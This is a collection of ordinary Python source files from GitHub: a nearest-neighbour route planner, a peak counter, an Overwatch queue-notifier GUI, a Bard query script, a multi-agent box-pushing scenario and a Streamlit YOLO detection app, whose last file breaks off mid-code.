{"seq_id":"24881979635","text":"\"\"\"\r\nThis program takes a list of cities (with distance to other cities) and a starting\r\ncity of the user's choice.\r\nIt then creates a tour starting in starting city, visiting all other cities,\r\nand goes back to starting city. It uses the nearest neighbour algorithm to\r\nchoose what city to visit next (visit whatever unvisited city which is closest),\r\nin hope to minimize total distance travelled.\r\n\r\nWe have opted to let the user create several Tours and therefore also let them\r\nchoose the ID for each tour they generate, since it could be a tour per salesman,\r\nor simply to compare different tours.\r\n\r\nInput: TourID, List of cities, starting city\r\nOutput: Tour of cities to visit in order, and total distance travelled.\r\n\r\nWe assume the user is able to provide the input list in the format of\r\n\"City1\", {\"City2\": Distance, \"City3\": Distance}\" for each city, as shown\r\nin the test.\r\n\r\nOur interpretation of the task is that the user will only provide a list of\r\ncities they actually want to include in tour.\r\n\"\"\"\r\n# Creating class City\r\n\r\nclass City:\r\n    # Using init to pass name and distance list\r\n    def __init__(self, name, distances):\r\n        self.name = name\r\n        if type(distances) == dict:\r\n            self.distances = distances\r\n        else:\r\n            print(\"Invalid data input, distance list is not in dict format\")\r\n            exit()\r\n\r\n\r\n\r\n    # Using magic repr method for printable representation\r\n    def __repr__(self):\r\n        return self.name\r\n\r\n    # Creating method to check distance to given city:\r\n    def distanceTo(self, toCity):\r\n        # Using try except to catch unexpected errors\r\n        try:\r\n            # Returns the distance to the toCity\r\n            return self.distances[toCity]\r\n        # If toCity key not found in distances dictionary of city:\r\n        except KeyError:\r\n            # Print error\r\n            print(f\"Cannot retrieve distance from {self.name} to {toCity}. 
Please revise dataset.\")\r\n # And exit, as it makes no sense to continue if data is missing for this task.\r\n exit()\r\n\r\n# Create class tour\r\n\r\nclass Tour:\r\n # Using init to pass variable tourID and create tourCities dict\r\n def __init__(self, tourid):\r\n # First pass tourID\r\n self.tourid = tourid\r\n # Create list to put the cities for the tour\r\n self.tourCities = {}\r\n\r\n # Using magic method __str__ for a printable representation\r\n def __str__(self):\r\n # Returning the tour ID and the list of cities to visit by the keys\r\n # in the dictionary tourCities. This is turned into a list then string\r\n # to print (and stripped of brackets), for better readability for the user than simply\r\n # printing the dictionary keys directly.\r\n return(\"Tour ID: #{} \\nCities to visit: {}\".format(self.tourid, str(list(self.tourCities.keys())).strip(\"[]\")))\r\n\r\n # Create method addCity\r\n def addCity(self, name, distances):\r\n \"\"\"\r\n This method adds a city to the tours tourCities list. It takes the\r\n city name and dictionary of distances as variables.\r\n \"\"\"\r\n # Create instance of city(with distances) and add it to tourCities\r\n self.tourCities[name] = City(name, distances)\r\n\r\n\r\n\r\n # Creating findTour method\r\n def findTour(self, startCity, inputList):\r\n \"\"\"\r\n This method takes starting city startCity and list of cities\r\n inputList as input. It returns an ordered list of cities to visit and\r\n the total distance travelled. The order is determined by the nearest\r\n neighbour algorithm where it chooses the next city by whatever\r\n unvisited city is closest.\r\n \"\"\"\r\n\r\n # Start for loop to add all cities from inputList to tourCity\r\n # This is put here as it is our interpretation that the user would not\r\n # provide cities in inputList that should not be added to the Tour.\r\n # If that was the case, this for loop could be removed and the user could\r\n # use addCity function for the cities wanted.\r\n for cityname, distances in inputList:\r\n # Calling addCity method for all elements in inputList\r\n self.addCity(cityname, distances)\r\n\r\n # Creating a list of unvisited cities by tourCities dictionary keys\r\n self.citiesLeft = list(self.tourCities.keys())\r\n\r\n # Removing starting city from the unvisited cities list\r\n self.citiesLeft.remove(startCity)\r\n\r\n # Initialize list of final route, starting with the starting city\r\n # In this list we only store the names(strings).\r\n finalTour = [startCity]\r\n\r\n # Initialize variable for final distance\r\n finalDistance = 0\r\n\r\n # Setting starting city as variable fromCity for first step\r\n fromCity = startCity\r\n\r\n # Starting while loop\r\n # Will keep going until there are no cities left to visit\r\n while (self.citiesLeft):\r\n\r\n # Create bestCity variable which will be city we go to\r\n bestCity = None\r\n\r\n # Create empty list of distances to remaining cities from fromCity\r\n possibleDistances = []\r\n\r\n # Starting for loop for each unvisited city left:\r\n for city in self.citiesLeft:\r\n #Get the distance from fromCity to other cities in list\r\n # Adding name of city and distance from fromCity to city to possibleDistances as a tuple\r\n possibleDistances.append((self.tourCities[city].name, self.tourCities[fromCity].distanceTo(city)))\r\n # The above operation could have been solved with list comprehension but as we\r\n # wish to return 2 values, we found that using a for loop gives better readability\r\n # in the code.\r\n\r\n # End for loop\r\n\r\n # 
To sort the list of possible distances, we make use of lambda to make a\r\n # quick function so we can sort by value (which is stored at position 1\r\n # in each element of the list)\r\n possibleDistances.sort(key=lambda x: x[1])\r\n # The list is now sorted.\r\n\r\n # Set variable bestCity to be the city at the first spot in the now sorted list\r\n # of distances, ie the closest City.\r\n bestCity = possibleDistances[0][0]\r\n\r\n # Add name of city to final tour list of cities to visit in order\r\n finalTour.append(bestCity)\r\n\r\n # Add distance from previous city to bestCity to total distance.\r\n # The distance is stored in possibleDistance list at position 1 in each element.\r\n # We know it is element 0 as the list is sorted in ascending order.\r\n finalDistance = finalDistance + possibleDistances[0][1]\r\n\r\n # Remove the name of best city from citiesLeft\r\n self.citiesLeft.remove(bestCity)\r\n\r\n # Change fromCity to the new city\r\n fromCity = bestCity\r\n\r\n # The salesman has now travelled to a new city and the loop can\r\n # start over as long as there are unvisited cities left.\r\n\r\n # End while loop\r\n\r\n # Return to starting city: Adding starting city as final city\r\n finalTour.append(self.tourCities[startCity].name)\r\n\r\n # Adding distance from current city to starting city.\r\n finalDistance = finalDistance + self.tourCities[fromCity].distanceTo(startCity)\r\n\r\n # Return the ordered list of cities to visit as well as the final distance travelled\r\n return(finalTour, finalDistance)\r\n\r\n\r\n\r\n\r\n\"\"\"\r\nCode for testing the program:\r\n\"\"\"\r\n# Create a function to test with given starting city\r\ndef testScript(startCity, TourID, inputList):\r\n \"\"\"\r\n This function is created to test the program.\r\n It will create a new tour with given TourID, and call the findTour function\r\n which will add the list of cities inputList to the Tour and create the\r\n tour itself starting (and ending) in startCity.\r\n This function then prints the results.\r\n \"\"\"\r\n # Create a tour instance\r\n TourID = Tour(TourID)\r\n # Save the ordered list of tourOrder and variable tourDistance to 2 variables\r\n tourOrder, tourDistance = TourID.findTour(startCity, inputList)\r\n # Print the tour ID (and list of cities to visit, unordered)\r\n print(\"--- NEW TOUR --- \\n\"\r\n f\"{TourID}\")\r\n # Print the ordered list of cities, removing brackets for readability\r\n print(\"List of cities to visit in order: {}\".format(str(tourOrder).strip(\"[]\")))\r\n # Printing distance travelled, limiting answer to 2 decimals\r\n # This is done due the computer's format (floating-point) that cannot represent\r\n # a number like 0.1, 0.2 or 0.3.\r\n # Source: https://floating-point-gui.de/basic/\r\n # Solution inspired from: https://docs.python.org/3/library/string.html#grammar-token-format-spec\r\n print(f\"Total distance travelled: {(tourDistance):.2f}) \\n\"\r\n \"Thank you for using this program. 
\\n\")\r\n\r\n# For testing function: activating when program is opened (not imported)\r\nif __name__ == \"__main__\":\r\n\r\n    # Adding list of example cities from task\r\n    inputList = [\r\n    (\"Bergen\", {\"Oslo\": 7.14, \"Stavanger\": 4.42, \"Trondheim\": 9.3, \"Kristiansand\": 7.39}),\r\n    (\"Oslo\", {\"Bergen\": 6.47, \"Stavanger\": 7.10, \"Trondheim\": 6.10, \"Kristiansand\": 3.56}),\r\n    (\"Kristiansand\", {\"Oslo\": 4.3, \"Bergen\": 7.45, \"Trondheim\": 10.17, \"Stavanger\": 3.33}),\r\n    (\"Stavanger\", {\"Oslo\": 7, \"Bergen\": 4.48, \"Trondheim\": 13.37, \"Kristiansand\": 3.14}),\r\n    (\"Trondheim\", {\"Oslo\": 6.24, \"Bergen\": 9.34, \"Stavanger\": 13.36, \"Kristiansand\": 10.12})\r\n    ]\r\n\r\n    # Running testScript function for Oslo and Bergen\r\n    testScript(\"Oslo\", \"TestTour1Oslo\", inputList)\r\n    testScript(\"Bergen\", \"TestTour2Bergen\", inputList)\r\n","repo_name":"siberianlikeyou/pythonhw2","sub_path":"testny.py","file_name":"testny.py","file_ext":"py","file_size_in_byte":9794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"}
{"seq_id":"42072201231","text":"# mas = []\n# n = int(input('input the quantity of items '))\n# m = 0\n\n# for i in range(n):\n#     mas.append(int(input('input item ')))\n\n# print (mas)\n\n### Or like this (building the array)\n\nl1 = [int(input(f\"Enter array element {i + 1}: \")) for i in range(int(input(\"Enter the array length: \")))]\n\n# i, n, count = 1, len(l1) - 1, 0\n# while i < n:\n#     if l1[i-1] < l1[i] > l1[i+1]:\n#         count += 1\n#     i += 1\n\ni, count = 1, 0\n\nfor i in range(i,len(l1) - 1):\n    if l1[i-1] < l1[i] > l1[i+1]:\n        count += 1\n\nprint(count)\n\n\n","repo_name":"dianovsd/geekbraines","sub_path":"python/seminar/6 seminar/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"}
{"seq_id":"16898837040","text":"import tkinter as tk\nimport threading\nfrom QueueWatcher import QueueWatcher\nimport time \nimport tkinter.messagebox as messagebox\nfrom datetime import datetime\nfrom utils import is_valid_email, logger\nimport os, sys\n\ndef resource_path(relative_path):\n    try:\n        base_path = sys._MEIPASS\n    except Exception:\n        base_path = os.path.abspath(\".\")\n\n    return os.path.join(base_path, relative_path)\nclass QueueWatcherGUI:\n    def __init__(self):\n        self.queue_watcher = QueueWatcher()\n        self.root = tk.Tk()\n        self.root.title(\"Overwatch Queue Watcher\")\n        self.root.iconbitmap(resource_path(\"hollow.ico\"))\n        self.root.geometry(\"600x600\")\n        self.root.resizable(False, False)\n        self.root.configure(background=\"sky blue\")\n\n        # Create a frame to hold the widgets in the right column\n        self.right_frame = tk.Frame(self.root)\n        self.right_frame.pack(side=\"right\", fill=\"both\", expand=True)\n        self.right_frame.configure(background=\"snow\")\n\n        #add current time status label\n        self.time_label = tk.Label(self.right_frame, text=\"Current Time: \", font=(\"Arial\", 10), bg=\"snow\")\n        self.time_label.pack()\n        self.update_time()\n\n        self.time_spent = 0\n        self.time_spent_job = None\n\n        #add Queue status label once start button is clicked\n        self.queue_status_label = tk.Label(self.right_frame, text=\"Queue Time: \", font=(\"Arial\", 12), bg=\"snow\")\n        self.queue_status_label.pack()\n\n        # Add a text box to describe how the program works\n        description_text = \"\"\"Default set for Overwatch 1920x1080 resolution. click set position to see which pixel the program is looking at. set offset x and y to adjust the pixel position. 
click start to start the program.\"\"\"\n self.description_box = tk.Text(self.right_frame, height=5, width=40, wrap=\"word\", font=(\"Helvetica\", 10), bg=\"snow\", bd = 1)\n self.description_box.insert(tk.END, description_text)\n self.description_box.config(state=\"disabled\")\n self.description_box.pack()\n\n # add an input box and a button to change the window name\n self.window_name_label = tk.Label(self.right_frame, text=\"Window Name: \", font=(\"Arial\", 10), bg=\"snow\")\n self.window_name_label.pack()\n\n self.window_name_input = tk.Entry(self.right_frame)\n self.window_name_input.insert(0, \"Overwatch\")\n self.window_name_input.pack()\n\n self.window_name_button = tk.Button(self.right_frame, text=\"Set Window Name\", command=self.set_window_name)\n self.window_name_button.configure(bg=\"lightblue\", fg=\"black\", activebackground=\"white\")\n self.window_name_button.pack()\n\n # Add labels and input fields for the coordinates, receiver email, sender email, and sender password\n x_label = tk.Label(self.right_frame, text=\"X Coordinate:\")\n x_label.pack()\n\n self.x_input = tk.Entry(self.right_frame)\n self.x_input.insert(0, \"0\")\n self.x_input.pack()\n\n y_label = tk.Label(self.right_frame, text=\"Y Coordinate:\")\n y_label.pack()\n\n self.y_input = tk.Entry(self.right_frame)\n self.y_input.insert(0, \"0\")\n self.y_input.pack()\n\n self.set_position_button = tk.Button(self.right_frame, text=\"Set Position\", command=self.set_position)\n self.set_position_button.configure(bg=\"lightblue\", fg=\"black\", activebackground=\"white\")\n self.set_position_button.pack()\n\n receiver_label = tk.Label(self.right_frame, text=\"Receiver Email:\")\n receiver_label.pack()\n\n self.receiver_input = tk.Entry(self.right_frame)\n self.receiver_input.pack()\n\n sender_label = tk.Label(self.right_frame, text=\"Sender Email:\")\n sender_label.pack()\n\n self.sender_input = tk.Entry(self.right_frame)\n self.default_sender = \"queuefound@gmail.com\"\n self.sender_input.insert(0, self.default_sender)\n self.sender_input.pack()\n\n password_label = tk.Label(self.right_frame, text=\"Sender Password:\")\n password_label.pack()\n\n self.password_input = tk.Entry(self.right_frame)\n self.password_input.pack()\n\n #add a set_email button\n self.set_email_button = tk.Button(self.right_frame, text=\"Set Email\", command=self.set_email)\n self.set_email_button.configure(bg=\"lightblue\", fg=\"black\", activebackground=\"white\")\n self.set_email_button.pack()\n self.receiver = None\n\n # Add the Start, Stop, and Set Position buttons to the right frame\n self.start_button = tk.Button(self.right_frame, text=\"Start\", command=self.start_queue_watcher)\n self.start_button.configure(bg=\"lightgreen\", fg=\"black\", activebackground=\"white\")\n self.start_button.pack()\n\n self.stop_button = tk.Button(self.right_frame, text=\"Stop\", command=self.stop_queue_watcher, state=\"disabled\")\n self.stop_button.configure(bg=\"pink\", fg=\"black\", activebackground=\"white\")\n self.stop_button.pack()\n\n\n # Add a button to change the background image\n self.current_image_index = 2\n self.image_filenames = [\"mercy.gif\", \"kiroko.gif\", \"hollow.png\"]\n #add a prefix to the list\n self.image_filenames = [resource_path(filename) for filename in self.image_filenames]\n\n self.change_background_button = tk.Button(self.root, text=\"Change Background\", command=self.change_background)\n self.change_background_button.configure(bg=\"white\", fg=\"black\", activebackground=\"white\")\n 
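        # (Editor's added note) change_background() advances current_image_index with\n        # (current_image_index + 1) % len(image_filenames), so repeated clicks cycle\n        # through mercy.gif, kiroko.gif and hollow.png and then wrap around.\n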
self.change_background_button.pack(side=\"bottom\")\n\n # add a feeling lucky button next to side of change background button\n self.feeling_lucky_button = tk.Button(self.root, text=\"Feeling Lucky\", command=self.feeling_lucky)\n self.feeling_lucky_button.configure(bg=\"white\", fg=\"black\", activebackground=\"white\")\n self.feeling_lucky_button.pack(side=\"bottom\")\n\n\n # Add the image to the left of the window\n self.background_image = tk.PhotoImage(file=resource_path(\"hollow.png\"))\n self.background_label = tk.Label(self.root, image=self.background_image)\n self.background_label.pack(side=\"left\")\n\n #stop all thread when program is closed\n self.root.protocol(\"WM_DELETE_WINDOW\", self.close_program)\n\n #check if the program is running\n self.check_queue_watcher()\n \n def set_window_name(self):\n window_name = self.window_name_input.get()\n self.queue_watcher = QueueWatcher(window_name)\n if self.queue_watcher.is_window_found():\n messagebox.showinfo(\"Window Found\", window_name + \" window is found\")\n else:\n messagebox.showerror(\"Window Not Found\", window_name + \" window is not found\")\n\n def update_clock(self):\n now = datetime.now()\n current_time = now.strftime(\"%H:%M:%S\")\n self.time_label.config(text=current_time)\n self.root.after(1000, self.update_clock) # update every second\n \n def update_time_spent(self):\n self.time_spent += 1\n self.queue_status_label.config(text=\"Queue Time: \" + str(self.time_spent) + \" seconds\")\n self.time_spent_job = self.root.after(1000, self.update_time_spent)\n \n def clear_time_spent(self):\n self.time_spent = 0\n self.queue_status_label.config(text=\"Queue Time: \" + str(self.time_spent) + \" seconds\")\n if self.time_spent_job is not None:\n self.root.after_cancel(self.time_spent_job)\n \n def feeling_lucky(self):\n messagebox.showinfo(\"Feeling Lucky\", \"You are feeling lucky today!\")\n \n def close_program(self):\n self.queue_watcher.stop()\n self.root.destroy()\n \n def change_background(self):\n # Increment the current image index\n self.current_image_index = (self.current_image_index + 1) % len(self.image_filenames)\n\n # Load the new image and display it\n self.background_image = tk.PhotoImage(file=self.image_filenames[self.current_image_index])\n self.background_label.configure(image=self.background_image)\n\n def update_time(self):\n # Get the current time and format it\n current_time = time.strftime('%H:%M:%S')\n # Update the label text\n self.time_label.configure(text=\"Current time: \" + current_time)\n # Schedule the next update in 1 second\n self.root.after(1000, self.update_time)\n \n #check whether the queuewatcher is running every 1 second\n def check_queue_watcher(self):\n if self.queue_watcher.is_queue_alive():\n self.start_button.config(state=\"disabled\")\n self.stop_button.config(state=\"normal\")\n else:\n self.start_button.config(state=\"normal\")\n self.stop_button.config(state=\"disabled\")\n self.clear_time_spent()\n self.root.after(1000, self.check_queue_watcher)\n\n def start_queue_watcher(self):\n #start count time spent\n self.receiver = self.receiver_input.get()\n logger.info(\"email info: %s\", self.queue_watcher.get_email_info())\n if not self.receiver:\n messagebox.showerror(\"Error\", \"Please enter your email address\")\n return\n self.update_time_spent()\n self.start_button.config(state=\"disabled\")\n self.stop_button.config(state=\"normal\")\n thread = threading.Thread(target=self.queue_watcher.run)\n thread.start()\n\n\n def stop_queue_watcher(self):\n self.clear_time_spent()\n 
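        # (Editor's added note) The buttons are returned to their idle state first, so the\n        # UI never shows an active Stop control for a watcher that is already shutting down.\n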
self.stop_button.config(state=\"disabled\")\n self.start_button.config(state=\"normal\")\n self.queue_watcher.stop()\n\n \n def set_position(self):\n self.start_button.config(state=\"normal\")\n x = int(self.x_input.get())\n y = int(self.y_input.get())\n \n screenshot = self.queue_watcher.get_queueing_image()\n self.queue_watcher.set_position(screenshot, show=True, offset_x=x, offset_y=y)\n \n\n def set_email(self):\n receiver = self.receiver_input.get()\n self.receiver = receiver\n sender = self.sender_input.get()\n password = self.password_input.get()\n\n if is_valid_email(sender) is False:\n messagebox.showwarning(\"Invalid Email\", \"Please enter a valid sender email address\")\n return\n \n if is_valid_email(receiver) is False:\n messagebox.showwarning(\"Invalid Email\", \"Please enter a valid receiver email address\")\n return\n\n if sender and sender != self.default_sender and not password:\n messagebox.showwarning(\"No Password\", \"No password is set for your own email\")\n return\n\n if not receiver:\n messagebox.showwarning(\"Error\", \"Please enter your receiver email address\")\n return\n\n self.queue_watcher.set_email_info(sender, password, receiver)\n messagebox.showinfo(\"Email Set\", \"sender: \" + sender + \"\\n receiver: \" + receiver)\n \n def run(self):\n self.root.mainloop()\n\n\nif __name__ == '__main__':\n gui = QueueWatcherGUI()\n gui.run()\n","repo_name":"qihang-dai/Overwatch2_QueueNotifier","sub_path":"GUI.py","file_name":"GUI.py","file_ext":"py","file_size_in_byte":11032,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"13747254493","text":"import os\nfrom Bard import Chatbot\n\ndef bard():\n token = open('token.txt', 'r').read().strip('\\n').strip()\n\n bot = Chatbot(token)\n\n question = open('test.txt', 'r').read().strip('\\n').strip()\n\n output = bot.ask(question)['content']\n\n print(output)\n \nif __name__ == '__main__':\n bard()","repo_name":"AnthonySinitsa/PythonPlayGround","sub_path":"api/bard.py","file_name":"bard.py","file_ext":"py","file_size_in_byte":291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"4304170829","text":"import numpy as np\nfrom multiagent.core import World, Agent, Landmark, Goal, Border\nfrom multiagent.scenario import BaseScenario\n\n\nclass Scenario(BaseScenario):\n def make_world(self, mode):\n \"\"\"\n - mode0: Pretrain from room2 to room1\n - mode1: Pretrain from room1 to target\n - mode2: Train from room2 to target\n \"\"\"\n world = World()\n self.mode = mode\n\n # add agents\n world.agents = [Agent() for i in range(2)]\n for i, agent in enumerate(world.agents):\n agent.name = 'agent %d' % i\n agent.collide = True\n agent.silent = True\n agent.size = 0.1\n agent.color = np.array([1.0, 0.0, 0.0]) if i == 0 else np.array([0.0, 1.0, 0.0])\n\n # add boxes\n self.box = Landmark()\n self.box.name = 'box'\n self.box.collide = True\n self.box.movable = True\n self.box.size = 0.25 # Radius\n self.box.initial_mass = 3.\n self.box.color = np.array([0.25, 0.25, 0.25])\n world.landmarks.append(self.box)\n\n # add targets\n self.target = Landmark()\n self.target.name = 'target'\n self.target.collide = False\n self.target.movable = False\n self.target.size = 0.05\n self.target.color = np.array([0.25, 0.25, 0.25])\n world.landmarks.append(self.target)\n\n # add borders\n self.add_borders(world)\n\n # add goals (used only for vis)\n world.goals = [Goal() for i in range(2)]\n for i, goal in enumerate(world.goals):\n 
goal.name = 'goal %d' % i\n goal.collide = False\n goal.movable = False\n goal.color = world.agents[i].color\n\n # make initial conditions\n self.reset_world(world)\n \n return world\n\n def add_borders(self, world):\n \"\"\" Adding the center border \"\"\"\n # Parameters\n self.length = 1.4\n offset = 0.1 # Distance between center to center\n n_border = round(self.length / offset)\n center_border = [Border() for _ in range(n_border)]\n\n # Add the center border\n x, y = 0, -1 + (offset / 2.)\n for border in center_border:\n border.name = \"border\"\n border.collide = True\n border.movable = False\n border.size = offset / 2.\n border.shape = [\n [-border.size, -border.size],\n [border.size, -border.size],\n [border.size, border.size],\n [-border.size, border.size]]\n border.color = np.array([0.25, 0.25, 0.25])\n border.state.p_vel = np.zeros(world.dim_p)\n border.state.p_pos = np.asarray([x, y])\n world.borders.append(border)\n\n x, y = x, y + offset\n\n # Define room1 and room2\n self.x_room1_from = -1.\n self.x_room1_to = 0. - border.size\n self.y_room1_from = -1.\n self.y_room1_to = +1.\n\n self.x_room2_from = 0. + border.size\n self.x_room2_to = 1.\n self.y_room2_from = -1.\n self.y_room2_to = +1.\n\n # Define boundary between room 1 and room 2\n self.boundary_pos = np.array([0., (self.length - 1.) + self.box.size])\n\n def reset_world(self, world):\n # random properties for agents\n # NOTE Agents always starting inside room 2\n for i, agent in enumerate(world.agents):\n agent.state.p_vel = np.zeros(world.dim_p)\n agent.state.c = np.zeros(world.dim_c)\n\n agent.state.p_pos = np.zeros(world.dim_p)\n agent.state.p_pos[0] = np.random.uniform(\n low=self.x_room2_from + agent.size * 1.5,\n high=self.x_room2_to - agent.size * 1.5)\n agent.state.p_pos[1] = np.random.uniform(\n low=self.y_room2_from + agent.size * 1.5,\n high=self.y_room2_to - agent.size * 1.5)\n\n # random properties for box\n # At mode 1, we initialize box at the boundary (with some noise)\n self.box.state.p_vel = np.zeros(world.dim_p)\n if self.mode == 0 or self.mode == 2:\n self.box.state.p_pos = np.array([self.boundary_pos[1], 0.])\n elif self.mode == 1:\n self.box.state.p_pos = np.array([0., self.boundary_pos[1]])\n\n # reset properties for target\n self.target.state.p_vel = np.zeros(world.dim_p)\n self.target.state.p_pos = np.array([-self.boundary_pos[1], 0.])\n\n # reset properties for goals (vis purpose)\n for i, goal in enumerate(world.goals):\n goal.state.p_pos = np.zeros(world.dim_p) - 2 # Initialize outside of the box\n goal.state.p_vel = np.zeros(world.dim_p)\n\n def reward(self, agent, world):\n # Inside Room 1\n if self.box.state.p_pos[0] < 0.:\n dist = np.sum(np.square(self.box.state.p_pos - self.target.state.p_pos))\n # Inside Room 2\n # NOTE room1_dist refers to maximum distance w.r.t room 1\n elif self.box.state.p_pos[0] >= 0.:\n room1_dist = np.sum(np.square(np.array([0., 1.]) - self.target.state.p_pos))\n room2_dist = np.sum(np.square(self.boundary_pos - self.box.state.p_pos))\n dist = room1_dist + room2_dist\n else:\n raise ValueError()\n\n return -dist / 10. 
# Reward scale\n\n def observation(self, agent, world):\n # get positions of all entities\n entity_pos = []\n entity_pos.append(self.box.state.p_pos)\n entity_pos.append(self.target.state.p_pos)\n\n # Add other agent position\n other_pos = []\n for other in world.agents:\n if other is agent: \n continue\n other_pos.append(other.state.p_pos)\n\n # border position\n border_pos = []\n border_pos.append(np.array([0., -1.]))\n border_pos.append(np.array([0., (self.length - 1.)]))\n\n return np.concatenate([agent.state.p_vel] + [agent.state.p_pos] + entity_pos + other_pos + border_pos)\n","repo_name":"MachengShen/robust_opponent_modeling","sub_path":"multiagent-particle-envs/multiagent/scenarios/maze_push.py","file_name":"maze_push.py","file_ext":"py","file_size_in_byte":5992,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"57"} +{"seq_id":"21183243011","text":"import math\nfrom ultralytics import YOLO\nimport streamlit as st\nimport pandas as pd\nimport os\nimport cv2\nimport numpy as np\nimport ffmpegcv\nimport supervision as sv\nfrom supervision.draw.color import Color\nfrom streamlit_image_annotation import detection\nimport os, shutil\nimport zipfile\nfrom pathlib import Path\n\nimport settings\n\n\ndef clear_folder(folder):\n if os.path.exists(folder):\n for filename in os.listdir(folder):\n file_path = os.path.join(folder, filename)\n try:\n if os.path.isfile(file_path) or os.path.islink(file_path):\n os.unlink(file_path)\n elif os.path.isdir(file_path):\n shutil.rmtree(file_path)\n except Exception as e:\n print('Failed to delete %s. Reason: %s' % (file_path, e))\n\ndef init_func():\n # init_models()\n st.session_state['initialized'] = True\n #remove detected images\n clear_folder(settings.RESULTS_DIR)\n clear_folder(settings.IMAGES_DIR)\n clear_folder(settings.DATA_DIR)\n clear_folder(settings.VIDEO_RES)\n\n\n\n# Checks that a new image is loaded\n# Changes the session state accordingly\ndef change_image(img_list):\n if st.session_state.next_img == True:\n st.session_state.next_img = False\n st.session_state['detect'] = False\n st.session_state['predicted'] = False\n st.session_state.img_num += 1\n if(st.session_state.img_num >= len(img_list)):\n st.write(\"At the end of image list! 
Upload more images\")\n st.session_state.img_num = 0\n if img_list:\n img = img_list[st.session_state.img_num]\n else:\n img = None\n if img.name != st.session_state.image_name:\n st.session_state['detect'] = False\n st.session_state['predicted'] = False\n st.session_state.image_name = img.name\n \n\n# Use this to repredict IMMEDIATELY, \n# Detect Does not have to be pressed again\ndef repredict():\n st.session_state['predicted'] = False\n st.session_state.segmented = False\n\n\n# Use this to repredict AFTER pressing detect\ndef redetect():\n st.session_state['predicted'] = False\n st.session_state['detect'] = False\n st.session_state.segmented = False\n\n# Detect Button \ndef click_detect():\n st.session_state['detect'] = True\n \n\n\n# Predict Function\n# Performs the object detection and image segmentation\ndef predict(_model, _uploaded_image, confidence, detect_type):\n boxes = []\n labels = []\n col1, col2 = st.columns(2)\n # Detection Stage\n if st.session_state['predicted'] == False:\n if st.session_state.model_type == \"Built-in\":\n res = _model.predict(_uploaded_image, conf=confidence, classes = [0,2,3], max_det=settings.MAX_DETECTION)\n res1 = _model.predict(_uploaded_image, conf=st.session_state.kelp_conf, classes = [1], max_det=settings.MAX_DETECTION)\n \n classes = res[0].names\n detections1 = sv.Detections.from_yolov8(res[0])\n detections2 = sv.Detections.from_yolov8(res1[0])\n detections = sv.Detections.merge([detections2, detections1])\n\n if detections1.mask is None:\n detections.mask = detections2.mask\n elif detections2.mask is None:\n detections.mask = detections1.mask\n boxes = detections.xyxy\n else:\n res = _model.predict(_uploaded_image, conf=confidence)\n classes = res[0].names\n detections = sv.Detections.from_yolov8(res[0])\n boxes = detections.xyxy\n\n if(detections is not None):\n labels = [\n f\"{idx} {classes[class_id]} {confidence:0.2f}\"\n for idx, [_, _, confidence, class_id, _] in enumerate(detections)\n ]\n \n box_annotator = sv.BoxAnnotator(text_scale=2, text_thickness=3, thickness=3, text_color=Color.white())\n annotated_image = box_annotator.annotate(scene=np.array(_uploaded_image), detections=detections, labels=labels)\n with col1:\n st.image(annotated_image, caption='Detected Image', use_column_width=True)\n st.session_state.results = [boxes, detections, classes, labels, annotated_image]\n #Interactive Detection Stage\n if interactive_detections():\n #Need to re-run segmenter, the bounding boxes have changed\n st.session_state.segmented = False\n\n #Segmentation Stage\n if detect_type == \"Objects + Segmentation\" and st.session_state.segmented == False:\n with col2:\n with st.spinner('Running Segmenter...'):\n #Show the Segmentation\n new_boxes = np.array(st.session_state['result_dict'][st.session_state.image_name]['bboxes'])\n new_boxes = np.floor(new_boxes)\n # Only choose the detection masks that have the same boxes as new_boxes\n cur_boxes = st.session_state.results[0]\n cur_boxes = np.floor(cur_boxes)\n for idx, [_, _, confidence, class_id, _] in enumerate(detections):\n if cur_boxes[idx] not in new_boxes:\n detections.mask[idx] = None\n\n # annotate image with detections\n box_annotator = sv.BoxAnnotator()\n mask_annotator = sv.MaskAnnotator()\n annotated_image = mask_annotator.annotate(scene=np.array(_uploaded_image), detections=detections)\n \n st.image(annotated_image, caption='Segmented Image', use_column_width=True)\n st.session_state.segmented = True\n st.session_state['predicted'] = True\n st.session_state.results[1] = detections \n 
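\n# --- Editor's added example (hypothetical sketch; not part of the original file) ---\n# predict() above queries the model twice -- once for most classes at the user's\n# confidence and once for class 1 (kelp) at its own threshold -- then merges both\n# passes. The bare pattern, with illustrative thresholds, looks like this:\ndef _example_two_pass_detect(model, image):\n    # class ids and conf values below are assumptions for illustration only\n    res_main = model.predict(image, conf=0.5, classes=[0, 2, 3])\n    res_special = model.predict(image, conf=0.25, classes=[1])\n    return sv.Detections.merge([sv.Detections.from_yolov8(res_special[0]),\n                                sv.Detections.from_yolov8(res_main[0])])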
\n\n#Results Calculations\ndef results_math( _image, detect_type):\n boxes, detections, classes ,_ ,_ = st.session_state.results\n\n if detect_type == \"Objects + Segmentation\" and detections.mask is not None:\n segmentation_mask = detections.mask\n class_id_list = detections.class_id\n binary_mask = np.where(segmentation_mask > 0.5, 1, 0)\n\n white_background = np.ones_like(_image) * 255\n new_images = white_background * (1 - binary_mask[..., np.newaxis]) + _image * binary_mask[..., np.newaxis]\n \n # Initialize empty lists to store data\n index_list = []\n class_id_list = []\n result_list = []\n confidence_list = []\n diameter_list = []\n\n # formatted boxes from manual annotator\n new_boxes = [[b[0], b[1], b[2]+b[0], b[3]+b[1]] for b in st.session_state['result_dict'][st.session_state.image_name]['bboxes']]\n new_boxes = np.array(new_boxes)\n\n if st.session_state.drop_quadrat == \"Area (Drop Quadrat)\":\n #Side length of PVC box in cm - Taken from the user\n side_length_PVC = st.session_state.side_length\n\n detected_boxes = np.floor(boxes)\n new_boxes = np.floor(new_boxes)\n\n for idx, [_, _, confidence, class_id, _] in enumerate(detections):\n if detected_boxes[idx] in new_boxes:\n if detect_type == \"Objects + Segmentation\":\n if st.session_state.drop_quadrat == \"Area (Drop Quadrat)\":\n #Get % of non white pixels inside box (assumed box height is height of image)\n percentage_of_box = np.sum(new_images[idx] != 255) / (new_images[idx].shape[0]*new_images[idx].shape[0]) * 100\n #Area of mask is area of PVC * percentage_of_box / 100\n result = side_length_PVC * side_length_PVC * percentage_of_box / 100\n #Calculate 